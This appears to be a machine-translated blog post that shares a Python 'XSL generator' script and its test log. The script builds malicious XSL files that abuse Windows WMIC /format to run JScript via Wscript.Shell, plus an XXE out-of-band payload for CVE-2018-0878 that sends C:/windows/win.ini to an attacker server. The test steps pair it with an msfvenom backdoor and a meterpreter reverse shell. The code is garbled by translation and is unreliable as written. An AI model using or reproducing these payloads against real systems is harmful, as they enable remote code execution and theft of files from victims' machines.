0x00 Preface
Today, Demon has been loaded with RSS feeds shared by brother. One of the articles is Miyoshi students:
After reading this article carefully, I learned some of the inside of the Sao operation, so with the following
Script.
0x001 Code
ImportOptparseImport TimeImportOSImportSocketdefMain (): Parser=Optparse. Optionparser () parser.add_option ('- b', dest='Local', action='store_true', help='Generator Local XSL') parser.add_option ('- y', dest='Long', action='store_true', help='Generator Long-range XSL') parser.add_option ('-j', dest='CVE', action='store_true', help='Conduct cve-2018-0878') (Options,args)=Parser.parse_args ()ifoptions.local:Local ()elifoptions. Long:long ()elifoptions. Cve:cve ()Else: Parser.print_help () exit ()defLocal (): With open ('poc.xsl','W') as L:l.write (" "<?xml version= "1.0"?><!--Copyright (c) Microsoft Corporation. All rights reserved. --><xsl:stylesheet version= "1.0" xmlns:xsl= "Http://www.w3.org/1999/XSL/Transform" xmlns:msxsl= "Urn:schemas -microsoft-com:xslt "xmlns:user=" urn:my-scripts "><xsl:output encoding=" utf-16 "omit-xml-declaration=" yes "/ ><xsl:param name= "Norefcomma"/><msxsl:script language= "JScript" implements-prefix= "user" > function MyFunction () {var r = new ActiveXObject ("Wscript.Shell"). Run ("Calc.exe"); Return ""; }</msxsl:script><xsl:template match= "/" ><xsl:value-of select= "user:myfunction ()"/>Node,<xsl : For-each select= "command/results[1]/cim/instance[1]//property| Command/results[1]/cim/instance[1]//property. array| Command/results[1]/cim/instance[1]//property. REFERENCE "><xsl:value-of select=" @NAME "/><xsl:if test=" position ()!=last () ">,</xsl:if></ Xsl:for-each><xsl:apply-templates select= "Command/results"/></xsl:template> <xsl:template match=" RESULTS "xml:space=" preserve "><xsl:apply-templates select= "Cim/instance"/></xsl:template> <xsl:template match= "VALUE. ARRAY "xml:space=" preserve ">{<xsl:for-each select=" VALUE "><xsl:apply-templates select=". " /><xsl:if test= "position ()!=last ()" >;</xsl:if></xsl:for-each>}</xsl:template><xsl : Template match= "VALUE" xml:space= "preserve" ><xsl:value-of select= "." /></xsl:template><xsl:template match= "INSTANCE" xml:space= "preserve" ><xsl:value-of select= ". /.. /@NODE "/>,<xsl:for-each select=" property| property. array| property. REFERENCE "><xsl:apply-templates select=". " /><xsl:if test= "position ()!=last ()" >,</xsl:if></xsl:for-each></xsl:template> <xsl: Template Match= "property. REFERENCE "xml:space=" preserve "><xsl:apply-templates select=" VALUE. REFERENCE "></xsl:apply-templates></xsl:template><xsl:template MatCh= "Property" ><xsl:apply-templates select= "VALUE"/></xsl:template><xsl:template match= " property. ARRAY "><xsl:for-each select=" VALUE. ARRAY "><xsl:apply-templates select=". " /></xsl:for-each></xsl:template><xsl:template match= "VALUE. REFERENCE ">" <xsl:apply-templates select= "Instancepath/namespacepath"/><xsl:apply-templates select= " instancepath/instancename| InstanceName "/>" </xsl:template><xsl:template match= "NamespacePath" >\\<xsl:value-of select= " Host/text () "/><xsl:for-each select=" Localnamespacepath/namespace ">\<xsl:value-of select=" @NAME "/> </xsl:for-each>:</xsl:template><xsl:template match= "InstanceName" ><xsl:value-of select= "@ CLASSNAME "/><xsl:for-each select=" KEYBINDING "><xsl:if test=" position () =1 ">.</xsl:if><xsl : value-of select= "@NAME"/>= "<xsl:value-of select=" Keyvalue/text () "/>" <xsl:if test= "position ()!=last () "></xsl:if><xsl:ifTest= "Not ($norefcomma ="true")" >,</xsl:if><xsl:if test= "$norefcomma ="true " " ><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template></xsl: Stylesheet>" ") L.close ()Print('[*]{}'. Format ('Generation Completion')) Print('[*]{}'. Format ('You want to bounce Meterpreter. Please create the back door and put the generated back door Inito the clear Computer,and use modify.py to modify the place Where EXE is executed')) Print('[*]{}'. Format ('Enter the directory where you store poc.xsl and exeute the command in the target computer:wmic OS get Format:poc'))defLong (): With open ('longpoc.xsl','W') as G:g.write (" "<?xml version= ' 1.0 '? ><stylesheetxmlns= "Http://www.w3.org/1999/XSL/Transform" xmlns:ms= "urn: Schemas-microsoft-com:xslt "xmlns:user=" placeholder "version=" 1.0 "><output method=" text "/> <ms:script implements-prefix= "User" language= "JScript" > <! [cdata[var r = new ActiveXObject ("Wscript.Shell"). Run ("Calc.exe"); ]]> </ms:script></stylesheet>" ") G.close ()Print('[*]{}'. Format ('Generation Completion')) Os.system ('MV Longpoc.xsl/var/www/html') Print('[*]{}'. Format ('This XSL was moved to the/var/www/html directory')) Print('[*]{}'. Format ('Modify The program executed in XLS with modify.py')) Print('[*]{}'. Format ('Put the generated back door into the target computer')) Print('[*]{}'. Format ('Start the Apache service')) Print('[*]{}'. Format ('WMIC OS get format: "Http://IP/Longpoc.xsl"'))defCve ():Print('[@]vulnerability introduction:https://www.exploit-db.com/exploits/44352/') s=Socket.socket (Socket.af_inet,socket. SOCK_DGRAM) Connect=s.connect (('8.8.8.8', 80)) IP=s.getsockname () [0] ml="python-m simplehttpserver 8080"With Open ('Xxe.xml','W') as C:c.write (" "<! ENTITY% Payload SYSTEM "File:///C:/windows/win.ini" > <! ENTITY% root "<! ENTITY & #37; OOB SYSTEM ' http://{}/?%payload; ' > ">" ". Format (IP)) c.close () Os.system ('MV Payload.xls/var/www/html') with open ('payload.xsl','W') as P:p.write (" "<?xml version= "1.0" encoding= "UTF-8"?> <! DOCTYPE ZSL [<! ENTITY% remote SYSTEM "Http://{}:8080/xxe.xml" >%remote;%root;%o OB;] >" ". Format (IP)) p.close ()Print('[*]{}'. Format ('Get The native IP:', IP)) Print('[*]{}'. Format ('Create a HTTT server')) Print('[*]{}'. Format ('Has been created Xxe.xml')) Print('[*]{}'. Format ('already moved/var/www/html')) Print('[*]{}'. Format ('Has Benn payload.xls,move him to the Computer,and execute the command:wmic os get format:payload.xsl')) Os.system (ML)if __name__=='__main__': Main ()
Test Result:-B
Attack aircraft: Ubuntu
Victim: Windows Server R2
After the build and after the modified XSL
Shell.exe generated by Msfvenom
Windows Server R2
Enter the directory where Shell.exe is executing in cmd: WMIC OS GET/FORMAT:SD
Perform monitoring in Ubuntu:
Use exploit/multi/192.168.223.1334444set PAYLOAD windows/x64/meterpreter/reverse_ Tcprun
Test Result:-j cve-2018-0878
Vulnerability Result details: https://www.exploit-db.com/exploits/44352/
Xxe.xml and Payload.xls are generated
Xxe.xml moved to/var/www/html.
Payload.xls into the victim Windows Server R2
Xxe.xml:
" File:///C:/windows/win.ini "> "">
Payload.xsl:
<?xml version="1.0" encoding="UTF-8" ?> <! DOCTYPE ZSL [ "http://192.168.223.133:8080/xxe.xml"> %remote ;%root;%o OB;] >
Launch Apache Service
Service Apache2 Start
Execute in Windows Server R2:
WMIC OS get/format:payload.xsl
Execution failed But the vulnerability triggered success.
Here's the-B option and I'm not going to show you the exact same steps as above two.
1. The generated poc.xsl modifies the program executed on the target machine and moves to the apache2
2. Turn on Apache2
3. Throw the generated back door to the target machine
4. Execute WMIC OS get/format: "Http://192.168.223.133/poc.xsl"
This is when WMIC requests XSL and executes. If you're listening now, you're getting a shell.
Python builds Xslgenerator